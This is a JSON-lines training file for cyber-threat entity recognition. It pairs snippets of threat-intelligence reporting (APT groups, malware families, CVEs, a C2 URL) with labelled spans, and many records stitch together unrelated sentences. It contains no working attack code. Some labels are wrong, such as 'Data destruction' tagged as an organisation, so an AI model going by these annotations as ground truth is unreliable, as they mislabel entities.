{"text": "RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism . Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance .", "spans": {"MALWARE: RIPPER": [[0, 6]], "TOOL: Niteris": [[185, 192]], "VULNERABILITY: exploit": [[193, 200]], "ORGANIZATION: banks": [[243, 248]]}, "info": {"id": "cyberner_stix_train_001078", "source": "cyberner_stix_train"}}
{"text": "Windows Defender ATP also integrates with the Windows protection stack so that protections from Windows Defender AV and Windows Defender Exploit Guard are reported in Windows Defender ATP portal , enabling SecOps personnel to centrally manage security , and as well as promptly investigate and respond to hostile activity in the network . APT40 was previously reported as TEMP.Periscope and TEMP.Jumper . The DllMain function replaces the pointer to GetModuleHandleA API with a pointer to hook routine that will return the base of the backdoor DLL when called with NULL as parameter ( instead of returing the handle to the launcher DLL ) . This fact was apparently unknown to Biderman and other Ashley Madison executives more than a year later when their July 2015 hack was first revealed .", "spans": {"SYSTEM: Windows Defender ATP": [[0, 20], [167, 187]], "SYSTEM: Windows": [[46, 53]], "SYSTEM: Windows Defender AV": [[96, 115]], "SYSTEM: Windows Defender Exploit Guard": [[120, 150]], "THREAT_ACTOR: APT40": [[339, 344]], "THREAT_ACTOR: TEMP.Periscope": [[372, 386]], "THREAT_ACTOR: TEMP.Jumper": [[391, 402]], "TOOL: DllMain": [[409, 416]], "TOOL: GetModuleHandleA API": [[450, 470]], "TOOL: DLL": [[544, 547], [632, 635]], "ORGANIZATION: Biderman": [[676, 684]], "ORGANIZATION: Ashley Madison executives": [[695, 720]]}, "info": {"id": "cyberner_stix_train_001079", "source": "cyberner_stix_train"}}
{"text": "Their 2015 CozyDuke and CloudDuke campaigns take this to the extreme by apparently opting for speed and quantity over stealth and quality .", "spans": {"MALWARE: CozyDuke": [[11, 19]], "MALWARE: CloudDuke": [[24, 33]]}, "info": {"id": "cyberner_stix_train_001080", "source": "cyberner_stix_train"}}
{"text": "APT16 actors sent spear phishing emails to two Taiwanese media organizations . Based on our analysis of Callisto Group 's usage of RCS Galileo , we believe the Callisto Group did not utilize the leaked RCS Galileo source code , but rather used the leaked readymade installers to set up their own installation of the RCS Galileo platform .", "spans": {"THREAT_ACTOR: APT16 actors": [[0, 12]], "ORGANIZATION: media organizations": [[57, 76]], "THREAT_ACTOR: Callisto Group": [[104, 118]], "MALWARE: installers": [[265, 275]]}, "info": {"id": "cyberner_stix_train_001081", "source": "cyberner_stix_train"}}
{"text": "This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs .", "spans": {"MALWARE: malware": [[5, 12]], "FILEPATH: bot": [[140, 143]]}, "info": {"id": "cyberner_stix_train_001082", "source": "cyberner_stix_train"}}
{"text": "And the C2 messages include a checksum algorithm that resembles those used in CHOPSTICK backdoor communications .", "spans": {"TOOL: C2": [[8, 10]], "MALWARE: CHOPSTICK backdoor": [[78, 96]]}, "info": {"id": "cyberner_stix_train_001083", "source": "cyberner_stix_train"}}
{"text": "CTU researchers also observed evidence that the threat actors collect credentials from high-privilege network accounts and reputationally sensitive accounts , such as social media and webmail accounts .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_001084", "source": "cyberner_stix_train"}}
{"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable .", "spans": {"MALWARE: malware": [[4, 11]], "TOOL: CMD/PowerShell": [[40, 54]], "THREAT_ACTOR: attackers": [[72, 81]], "MALWARE: self-extracting RAR": [[174, 193]], "TOOL: DLL": [[244, 247]], "FILEPATH: Loader.dll": [[255, 265]], "FILEPATH: readme.txt": [[283, 293]]}, "info": {"id": "cyberner_stix_train_001085", "source": "cyberner_stix_train"}}
{"text": "eu.eleader.mobilebanking.pekao softax.pekao.powerpay softax.pekao.mpos dk.jyskebank.mobilbank com.starfinanz.smob.android.bwmobilbanking eu.newfrontier.iBanking.mobile.SOG.Retail com.accessbank.accessbankapp com.sbi.SBIFreedomPlus com.zenithBank.eazymoney net.cts.android.centralbank com.f1soft.nmbmobilebanking.activities.main com.lb.smartpay com.mbmobile In the spring of 2014 , we noticed an increase in the volume of attack activity by the Naikon APT . Gamaredon Group is a Cyber Espionage persistent operation attributed to Russians FSB ( Federal Security Service ) in a long-term military and geo-political confrontation against the Ukrainian government and more in general against the Ukrainian military power . Siamesekitten has been active since 2018 and has in the past targeted oil , gas , and telecom companies .", "spans": {"THREAT_ACTOR: Naikon APT": [[444, 454]], "THREAT_ACTOR: Gamaredon": [[457, 466]], "ORGANIZATION: Russians FSB": [[529, 541]], "ORGANIZATION: Federal Security Service": [[544, 568]], "ORGANIZATION: Ukrainian government": [[639, 659]], "THREAT_ACTOR: Siamesekitten": [[719, 732]], "ORGANIZATION: oil , gas , and telecom companies": [[789, 822]]}, "info": {"id": "cyberner_stix_train_001086", "source": "cyberner_stix_train"}}
{"text": "Of note , the Company name Grizli777 is indicative of a cracked version of Microsoft Word .", "spans": {"ORGANIZATION: Grizli777": [[27, 36]], "ORGANIZATION: Microsoft": [[75, 84]], "TOOL: Word": [[85, 89]]}, "info": {"id": "cyberner_stix_train_001087", "source": "cyberner_stix_train"}}
{"text": "Lookout notified Google of the potential threat shortly after it was discovered . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 . The group mainly targets the telecommunications and IT services sectors .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "ORGANIZATION: Google": [[17, 23]], "VULNERABILITY: CVE-2015-8651": [[229, 242]], "VULNERABILITY: CVE-2016-1019": [[245, 258]], "VULNERABILITY: CVE-2016-4117": [[265, 278]], "ORGANIZATION: telecommunications": [[310, 328]], "ORGANIZATION: IT services sectors": [[333, 352]]}, "info": {"id": "cyberner_stix_train_001088", "source": "cyberner_stix_train"}}
{"text": "We found this could be used to supply compelling “ victim data ” to convince the attacker to connect to this “ victim ” via the GUI .", "spans": {}, "info": {"id": "cyberner_stix_train_001089", "source": "cyberner_stix_train"}}
{"text": "Based on the similarity of the naming convention and data format , we believe the Spark backdoor could be an evolution of the backdoor mentioned in Operation Parliament , or at least inspired by the malware .", "spans": {"MALWARE: Spark backdoor": [[82, 96]]}, "info": {"id": "cyberner_stix_train_001090", "source": "cyberner_stix_train"}}
{"text": "The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so . The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee .", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: Word document": [[150, 163]], "FILEPATH: manual.doc": [[164, 174]], "THREAT_ACTOR: Honeybee": [[244, 252]]}, "info": {"id": "cyberner_stix_train_001091", "source": "cyberner_stix_train"}}
{"text": "Further investigation showed that the malware , which we named BusyGasper , is not all that sophisticated , but demonstrates some unusual features for this type of threat . McAfee Advanced Threat Research analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact . Gpppassword : Tool used to obtain and decrypt Group Policy Preferences ( GPP ) passwords . Data destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected .", "spans": {"MALWARE: BusyGasper": [[63, 73]], "ORGANIZATION: McAfee Advanced Threat Research": [[173, 204]], "THREAT_ACTOR: cybercrime group": [[300, 316]], "THREAT_ACTOR: Lazarus": [[317, 324]], "TOOL: sophisticated malware": [[335, 356]], "MALWARE: Gpppassword": [[381, 392]], "ORGANIZATION: Data destruction": [[472, 488]]}, "info": {"id": "cyberner_stix_train_001092", "source": "cyberner_stix_train"}}
{"text": "However , GeminiDuke samples compiled after MSK was altered still vary the timezone between UTC+3 in the winter and UTC+4 during the summer .", "spans": {"MALWARE: GeminiDuke": [[10, 20]]}, "info": {"id": "cyberner_stix_train_001093", "source": "cyberner_stix_train"}}
{"text": "The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild . APT Anchor Panda is a Chinese threat actor group who target maritime operations .", "spans": {"TOOL: Lambert family malware": [[19, 41]], "ORGANIZATION: FireEye": [[92, 99]], "VULNERABILITY: zero day exploit": [[122, 138]], "VULNERABILITY: CVE-2014-4148": [[141, 154]]}, "info": {"id": "cyberner_stix_train_001094", "source": "cyberner_stix_train"}}
{"text": "CHANGE_GCM_ID – change GCM ID . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers .", "spans": {"MALWARE: Backdoor.Nidiran": [[141, 157]], "THREAT_ACTOR: Leafminer": [[264, 273]], "THREAT_ACTOR: operators": [[274, 283]], "VULNERABILITY: EternalBlue": [[288, 299]]}, "info": {"id": "cyberner_stix_train_001095", "source": "cyberner_stix_train"}}
{"text": "The COZY BEAR intrusion relied primarily on the SeaDaddy implant developed in Python and compiled with py2exe and another Powershell backdoor with persistence accomplished via Windows Management Instrumentation ( WMI ) system , which allowed the adversary to launch malicious code automatically after a specified period of system uptime or on a specific schedule .", "spans": {"THREAT_ACTOR: COZY BEAR": [[4, 13]], "MALWARE: SeaDaddy": [[48, 56]], "TOOL: Python": [[78, 84]], "TOOL: py2exe": [[103, 109]], "TOOL: Powershell": [[122, 132]], "SYSTEM: Windows": [[176, 183]], "TOOL: Management Instrumentation": [[184, 210]], "TOOL: WMI": [[213, 216]]}, "info": {"id": "cyberner_stix_train_001096", "source": "cyberner_stix_train"}}
{"text": "Traps detects and blocks malicious behavior exhibited by new , unknown Quasar samples .", "spans": {"TOOL: Traps": [[0, 5]], "MALWARE: Quasar": [[71, 77]]}, "info": {"id": "cyberner_stix_train_001097", "source": "cyberner_stix_train"}}
{"text": "Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 .", "spans": {"ORGANIZATION: Anomali": [[0, 7]], "MALWARE: ITW": [[86, 89]], "VULNERABILITY: CVE-2018-0798": [[117, 130]], "FILEPATH: sample": [[279, 285]], "VULNERABILITY: CVE-2017-11882": [[305, 319]], "VULNERABILITY: CVE-2018-0802": [[323, 336]]}, "info": {"id": "cyberner_stix_train_001098", "source": "cyberner_stix_train"}}
{"text": "EventBot infected device to be sent to the C Information gathered about the infected device to be sent to the C2 . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations foreign governments .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: Okrum malware": [[169, 182]], "MALWARE: Ketrican backdoors": [[199, 217]], "THREAT_ACTOR: APT32": [[287, 292]], "THREAT_ACTOR: OceanLotus Group": [[313, 329]], "ORGANIZATION: foreign corporations": [[345, 365]], "ORGANIZATION: governments": [[374, 385]]}, "info": {"id": "cyberner_stix_train_001099", "source": "cyberner_stix_train"}}
{"text": "However , at this time we do not believe the April attacks used AntSword based on artifacts analyzed on the SharePoint server , specifically none of the IIS logs in the April attacks used the AntSword User-Agent in requests to the webshell that were observed in the current attacks .", "spans": {"TOOL: SharePoint": [[108, 118]], "TOOL: IIS": [[153, 156]], "TOOL: AntSword": [[192, 200]], "TOOL: User-Agent": [[201, 211]]}, "info": {"id": "cyberner_stix_train_001100", "source": "cyberner_stix_train"}}
{"text": "Since 2013 , the Cobalt have attempted to attack banks and financial institutions using pieces of malware they designed . In addition to the original \" Infy \" variant , we also see the newer , more sophisticated , interactive , and fuller-featured \" Infy M \" variant deployed against apparently-higher-value targets .", "spans": {"THREAT_ACTOR: Cobalt": [[17, 23]], "ORGANIZATION: banks": [[49, 54]], "ORGANIZATION: financial institutions": [[59, 81]], "MALWARE: Infy": [[152, 156]], "MALWARE: Infy M": [[250, 256]]}, "info": {"id": "cyberner_stix_train_001101", "source": "cyberner_stix_train"}}
{"text": "Each instance had between 100,000 and 500,000 downloads according to Google Play statistics , reaching an aggregated infection rate of between 200,000 and 1 million users . The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . Several of these provide enterprise services or cloud hosting , supporting our assessment that APT10 are almost certainly targeting MSPs .", "spans": {"SYSTEM: Google Play": [[69, 80]], "ORGANIZATION: Unit 42": [[202, 209]], "MALWARE: EPS files": [[282, 291]], "VULNERABILITY: CVE-2015-2545": [[306, 319]], "VULNERABILITY: CVE-2017-0261": [[324, 337]], "THREAT_ACTOR: APT10": [[451, 456]], "ORGANIZATION: MSPs": [[488, 492]]}, "info": {"id": "cyberner_stix_train_001102", "source": "cyberner_stix_train"}}
{"text": "At this time , the Trojan also began actively using different methods of obfuscation . These emails included recruitment-themed lures and links to malicious HTML application ( HTA ) files . WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": {"TOOL: HTML application": [[157, 173]], "MALWARE: HTA": [[176, 179]], "MALWARE: WannaCry": [[190, 198]], "VULNERABILITY: exploit": [[212, 219]], "VULNERABILITY: EternalBlue": [[234, 245]], "THREAT_ACTOR: Shadow Brokers": [[275, 289]]}, "info": {"id": "cyberner_stix_train_001103", "source": "cyberner_stix_train"}}
{"text": "CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia .", "spans": {"VULNERABILITY: CVE-2017-0143": [[0, 13]], "MALWARE: tools—EternalRomance": [[49, 69]], "MALWARE: EternalSynergy—that": [[74, 93]], "THREAT_ACTOR: Bahamut": [[221, 228]]}, "info": {"id": "cyberner_stix_train_001104", "source": "cyberner_stix_train"}}
{"text": "Finally , early CozyDuke versions also featured other elements that one would associate more with a traditional software development project than with malware .", "spans": {"MALWARE: CozyDuke": [[16, 24]]}, "info": {"id": "cyberner_stix_train_001105", "source": "cyberner_stix_train"}}
{"text": "Quasar serve is vulnerable to a simple DLL hijacking attack , by using this technique to replace server DLLs .", "spans": {"MALWARE: Quasar": [[0, 6]], "TOOL: DLL": [[39, 42]]}, "info": {"id": "cyberner_stix_train_001106", "source": "cyberner_stix_train"}}
{"text": "Further research identified dozens of Dowenks and Quasar samples related to these attackers .", "spans": {"MALWARE: Dowenks": [[38, 45]], "MALWARE: Quasar": [[50, 56]]}, "info": {"id": "cyberner_stix_train_001107", "source": "cyberner_stix_train"}}
{"text": "All of its capabilities are discussed later in this blog . Exploit and tools continued to be used after Buckeye's apparent disappearance in 2017 . Clusters of Winnti related activity have become a complex topic in threat intelligence circles , with activity vaguely attributed to different codenamed threat actors .", "spans": {"THREAT_ACTOR: Buckeye's": [[104, 113]], "MALWARE: Winnti": [[159, 165]]}, "info": {"id": "cyberner_stix_train_001108", "source": "cyberner_stix_train"}}
{"text": "The researchers believe that the devices somehow had the malware pre-loaded at the time of shipping from the manufacturer , or was likely distributed inside modified Android firmware . Between June 2008 and March 2009 the Information Warfare Monitor conducted an extensive and exhaustive two-phase investigation focused on allegations of Chinese cyber espionage against the Tibetan community . APT1 has a well-defined attack methodology , honed over years and designed to steal large volumes of valuable intellectual property . The web page “ about.htm ” implements an exploit for Microsoft Internet Explorer 8 .", "spans": {"SYSTEM: Android": [[166, 173]], "ORGANIZATION: Tibetan community": [[374, 391]], "THREAT_ACTOR: APT1": [[394, 398]], "SYSTEM: Microsoft Internet Explorer 8": [[581, 610]]}, "info": {"id": "cyberner_stix_train_001109", "source": "cyberner_stix_train"}}
{"text": "Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . From early June , when the cyber-attack on the Japan Pension Service started to be reported widely , various Japanese organizations would have started to deploy protection measures .", "spans": {"MALWARE: Silence.MainModule": [[0, 18]], "MALWARE: CMD.EXE": [[96, 103]], "ORGANIZATION: Pension Service": [[288, 303]]}, "info": {"id": "cyberner_stix_train_001110", "source": "cyberner_stix_train"}}
{"text": "CrowdStrike Intelligence first identified new GandCrab ransomware deployment tactics in mid-February , when a threat actor was observed performing actions on a victim host in order to install GandCrab . Aside from the four companies which have publicly acknowledged attacks , Symantec has identified five other large technology firms compromised by Butterfly , primarily headquartered in the US .", "spans": {"ORGANIZATION: CrowdStrike Intelligence": [[0, 24]], "TOOL: GandCrab ransomware": [[46, 65]], "TOOL: GandCrab": [[192, 200]], "ORGANIZATION: Symantec": [[276, 284]], "ORGANIZATION: technology firms": [[317, 333]]}, "info": {"id": "cyberner_stix_train_001111", "source": "cyberner_stix_train"}}
{"text": "Following simple best practices , like strictly downloading applications or any files from trusted sources and being wary of unsolicited messages , can also prevent similar attacks from compromising devices . The targets of TG-4127 include military , government and defense sectors . As with the text mode receiver, the query is made with a direct connection to the controller IP address as opposed to allowing the query to propagate the native DNS . Earlier campaigns used an executable downloader , while the later ones used DLLs for the next stage .", "spans": {"THREAT_ACTOR: TG-4127": [[224, 231]], "ORGANIZATION: military": [[240, 248]], "ORGANIZATION: government": [[251, 261]], "ORGANIZATION: defense sectors": [[266, 281]], "TOOL: executable downloader": [[477, 498]], "TOOL: DLLs": [[527, 531]]}, "info": {"id": "cyberner_stix_train_001112", "source": "cyberner_stix_train"}}
{"text": "The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . It's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: Daserf malware": [[92, 106]], "VULNERABILITY: Flash exploits": [[132, 146]], "MALWARE: DNS-based attack technique": [[191, 217]], "ORGANIZATION: Arbor 's ASERT Team": [[348, 367]]}, "info": {"id": "cyberner_stix_train_001113", "source": "cyberner_stix_train"}}
{"text": "A big chunk of data is extracted from the portable executable ( PE ) file itself and decrypted two times using a custom XOR algorithm . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 . Recent versions of the malware include an “ auto-update ” mechanism , using C&C server http://checkin.travelsanignacio.com . CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[136, 149]], "VULNERABILITY: CVE-2014-6332": [[176, 189]], "TOOL: Emissary Trojan": [[222, 237]], "URL: http://checkin.travelsanignacio.com": [[354, 389]], "ORGANIZATION: CrowdStrike Services": [[392, 412]], "THREAT_ACTOR: Play ransomware intrusions": [[443, 469]], "VULNERABILITY: Microsoft Exchange ProxyNotShell": [[524, 556]], "VULNERABILITY: CVE-2022 - 41040": [[573, 589]], "VULNERABILITY: CVE-2022 - 41082": [[594, 610]]}, "info": {"id": "cyberner_stix_train_001114", "source": "cyberner_stix_train"}}
{"text": "Most malware found on Google Play contains only a dropper that later downloads the real malicious components to the device . In September 2017 , we discovered Silence attack on financial institutions . One of the servers is a Griffon C2, and the other one , an AveMaria C2 . By analyzing field data we see a gap in the implementation of CSP , and even for sites that do use it correctly , this creates an open window to exfiltrate data .", "spans": {"SYSTEM: Google Play": [[22, 33]], "ORGANIZATION: financial institutions": [[177, 199]], "MALWARE: Griffon": [[226, 233]], "MALWARE: AveMaria": [[261, 269]], "TOOL: C2": [[270, 272]], "VULNERABILITY: a gap in the implementation of CSP": [[306, 340]], "SYSTEM: sites": [[356, 361]]}, "info": {"id": "cyberner_stix_train_001115", "source": "cyberner_stix_train"}}
{"text": "The IndiaBravo-PapaAlfa installer is responsible for installing the service DLL variant . Although the developers of Bookworm have included only keylogging functionality in Bookworm as a core ability , as suggested in Table 1 , several of the embedded DLLs provide Leader with cryptographic and hashing functions , while others support Leader 's ability to communicate with its C2 server .", "spans": {"TOOL: IndiaBravo-PapaAlfa installer": [[4, 33]], "MALWARE: Bookworm": [[117, 125], [173, 181]], "MALWARE: Leader": [[336, 342]], "TOOL: C2": [[378, 380]]}, "info": {"id": "cyberner_stix_train_001116", "source": "cyberner_stix_train"}}
{"text": "Apart from general information about the device , the Trojan sends a list of all the running processes and installed applications to the C & C . The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars . CTU researchers assess this as the continuation of activity first observed in 2016 , and it is likely that the campaign is ongoing .", "spans": {"MALWARE: Seminar-Invitation.doc": [[185, 207]], "TOOL: Microsoft Word": [[231, 245]], "TOOL: ThreeDollars": [[267, 279]], "ORGANIZATION: CTU": [[282, 285]]}, "info": {"id": "cyberner_stix_train_001117", "source": "cyberner_stix_train"}}
{"text": "Once Domain Controller access was acquired , Pinchy Spider used the enterprise 's own IT systems management software , LANDesk , to deploy a loader to hosts across the enterprise . Butterfly has also shown an interest in the commodities sector , attacking two major companies involved in gold and oil in late 2014 .", "spans": {"TOOL: LANDesk": [[119, 126]], "THREAT_ACTOR: Butterfly": [[181, 190]], "ORGANIZATION: commodities sector": [[225, 243]], "ORGANIZATION: gold": [[288, 292]], "ORGANIZATION: oil": [[297, 300]]}, "info": {"id": "cyberner_stix_train_001118", "source": "cyberner_stix_train"}}
{"text": "Stolen data will also be encrypted and sent to the C & C server via the socket connection . ScarCruft is a relatively new APT group ; victims have been observed in several countries , including Russia , Nepal , South Korea , China , India , Kuwait and Romania . Here is a PowerLinks style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon . Greatness offers the ability for users to bypass targets ’ multi - factor authentication protections , IP filtering and integration with Telegram bots .", "spans": {"THREAT_ACTOR: ScarCruft": [[92, 101]], "TOOL: PowerLinks": [[272, 282]], "MALWARE: GRIFFON": [[357, 364]], "TOOL: Greatness": [[394, 403]]}, "info": {"id": "cyberner_stix_train_001119", "source": "cyberner_stix_train"}}
{"text": "Eset‍ has published a report on the state-sponsored Russian turla apt group ‍. The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper .", "spans": {"ORGANIZATION: Eset‍": [[0, 5]], "THREAT_ACTOR: turla": [[60, 65]], "FILEPATH: MSIL dropper": [[127, 139]], "TOOL: PDF": [[178, 181]], "FILEPATH: Javascript (JS) dropper": [[194, 217]]}, "info": {"id": "cyberner_stix_train_001120", "source": "cyberner_stix_train"}}
{"text": "Within Unit 74455 , Officer Aleksy Potemkin—a department supervisor—oversaw information operations infrastructure .", "spans": {"THREAT_ACTOR: Unit 74455": [[7, 17]]}, "info": {"id": "cyberner_stix_train_001121", "source": "cyberner_stix_train"}}
{"text": "It is interesting to see that the group has expanded their operation to other regions , such as the United States and Europe . But with the West African gang we’ve named Scattered Canary , we have a deeper look at how business email compromise is connected to the rest of the cybercrime . Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets , keyloggers , remote access tools ( RATs ) , and wiper malware .", "spans": {"THREAT_ACTOR: Scattered Canary": [[170, 186]], "THREAT_ACTOR: HIDDEN COBRA actors": [[320, 339]], "MALWARE: DDoS botnets": [[348, 360]], "MALWARE: keyloggers": [[363, 373]], "MALWARE: remote access tools": [[376, 395]], "MALWARE: RATs": [[398, 402]], "MALWARE: wiper": [[411, 416]], "MALWARE: malware": [[417, 424]]}, "info": {"id": "cyberner_stix_train_001122", "source": "cyberner_stix_train"}}
{"text": "The tools and malware used in this breach were also signed with stolen digital certificates .", "spans": {}, "info": {"id": "cyberner_stix_train_001123", "source": "cyberner_stix_train"}}
{"text": "There are a lot of other ‘ Negg ’ mentions in Whois records and references to it . The obvious goal of the SEDNIT-related spyware is to steal personal data , record audio , make screenshots , and send them to a remote command-and-control (C&C) server . We observed the admin@338 upload a second stage malware , known as BUBBLEWRAP ( also known as Backdoor.APT.FakeWinHTTPHelper ) to their Dropbox account along with the following command .", "spans": {"THREAT_ACTOR: SEDNIT-related": [[107, 121]], "ORGANIZATION: personal data": [[142, 155]], "THREAT_ACTOR: admin@338": [[269, 278]], "MALWARE: BUBBLEWRAP": [[320, 330]], "MALWARE: Backdoor.APT.FakeWinHTTPHelper": [[347, 377]], "TOOL: Dropbox": [[389, 396]]}, "info": {"id": "cyberner_stix_train_001124", "source": "cyberner_stix_train"}}
{"text": "In this campaign , attackers used a Microsoft Word document called 0721.doc , which exploits CVE-2017-0199 .", "spans": {"ORGANIZATION: Microsoft": [[36, 45]], "TOOL: Word": [[46, 50]], "FILEPATH: 0721.doc": [[67, 75]], "VULNERABILITY: CVE-2017-0199": [[93, 106]]}, "info": {"id": "cyberner_stix_train_001125", "source": "cyberner_stix_train"}}
{"text": "In April 2015 , alleged pro-ISIS hacktivist group CyberCaliphate defaced TV5Monde ’s websites and social media profiles and forced the company ’s 11 broadcast channels offline .", "spans": {"THREAT_ACTOR: CyberCaliphate": [[50, 64]], "ORGANIZATION: TV5Monde": [[73, 81]]}, "info": {"id": "cyberner_stix_train_001126", "source": "cyberner_stix_train"}}
{"text": "The credentials were immediately available in the leaky database – see Figure 6 . In some samples deployed since March 2019 , Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface (AMSI) . This alert 's IOC files provide HIDDEN COBRA indicators related to FALLCHILL .", "spans": {"THREAT_ACTOR: Turla": [[126, 131]], "FILEPATH: IOC files": [[250, 259]], "THREAT_ACTOR: HIDDEN COBRA": [[268, 280]], "MALWARE: FALLCHILL": [[303, 312]]}, "info": {"id": "cyberner_stix_train_001127", "source": "cyberner_stix_train"}}
{"text": "Also of particular interest was the use of a domain hosting company that accepts BTC and was previously heavily leveraged by the well-known Russian group APT28 . Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download .", "spans": {"ORGANIZATION: domain hosting company": [[45, 67]], "THREAT_ACTOR: APT28": [[154, 159]], "VULNERABILITY: CVE-2017-1099": [[233, 246]], "TOOL: RTF": [[262, 265]]}, "info": {"id": "cyberner_stix_train_001128", "source": "cyberner_stix_train"}}
{"text": "AdroMut downloads the malware ServHelper and FlawedAmmy RAT used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor . The documents that exploit CVE2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe .", "spans": {"TOOL: ServHelper": [[30, 40]], "TOOL: FlawedAmmy": [[45, 55]], "THREAT_ACTOR: SectorJ04": [[72, 81]], "VULNERABILITY: exploit": [[190, 197]], "VULNERABILITY: CVE2017-11882": [[198, 211]], "TOOL: HTML Application": [[242, 258]], "TOOL: HTA": [[261, 264]], "TOOL: Visual Basic": [[291, 303]], "TOOL: VBS": [[306, 309]], "FILEPATH: mshta.exe": [[394, 403]]}, "info": {"id": "cyberner_stix_train_001129", "source": "cyberner_stix_train"}}
{"text": "Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers . Execute a command through exploits for CVE-2018-0802 .", "spans": {"VULNERABILITY: CVE-2015-2546": [[8, 21]], "THREAT_ACTOR: attackers": [[168, 177]], "VULNERABILITY: CVE-2018-0802": [[219, 232]]}, "info": {"id": "cyberner_stix_train_001130", "source": "cyberner_stix_train"}}
{"text": "VICTIMOLOGY ON THE IDENTIFIED CAMPAIGNS The campaigns we analyzed targeted Android devices in Thailand . The latest version of Madi also has the ability to monitor the Russian social network Vkontakte ( VK ) along with the Jabber messaging platform to look for users who visit websites that contain words like \" USA \" , \" Skype \" , and \" gov \" . To date , we have seen several custom Base64 alphabets , including : +NO5RZaGHviIjhYq8b4ndQ=p012ySTcCDrs/xPgUz67FM3wemKfkJLBo9VtWXlEuA , HZa4vjIiGndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu , j4vpGZaHnIdQ=i012y+N/zPgUO5RSTx67FMhYb8q3we mKckJLBofCDrs9VtWXlEu , p12kJLBofCDrs9VtWXlEuainyj4vd+=H0GZIQNO5RST/ zPgUx67FMhYb8q3wemKc , aZHGviIj4ndQ=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu , ZvQIajHi4ndG=p012y+NO5RST/xPgUz67FMhYq8b3wemKfkJLBocCDrs9VtWXlEu . CSP can define a list of domains that the browser should be allowed to interact with for the visited URL .", "spans": {"SYSTEM: Android": [[75, 82]], "ORGANIZATION: CSP": [[820, 823]], "TOOL: browser": [[862, 869]], "SYSTEM: URL": [[921, 924]]}, "info": {"id": "cyberner_stix_train_001131", "source": "cyberner_stix_train"}}
{"text": "Their targets have also included the governments of members of the Commonwealth of Independent States ; Asian , African , and Middle Eastern governments ; organizations associated with Chechen extremism ; and Russian speakers engaged in the illicit trade of controlled substances and drugs .", "spans": {"ORGANIZATION: Commonwealth of Independent States": [[67, 101]]}, "info": {"id": "cyberner_stix_train_001132", "source": "cyberner_stix_train"}}
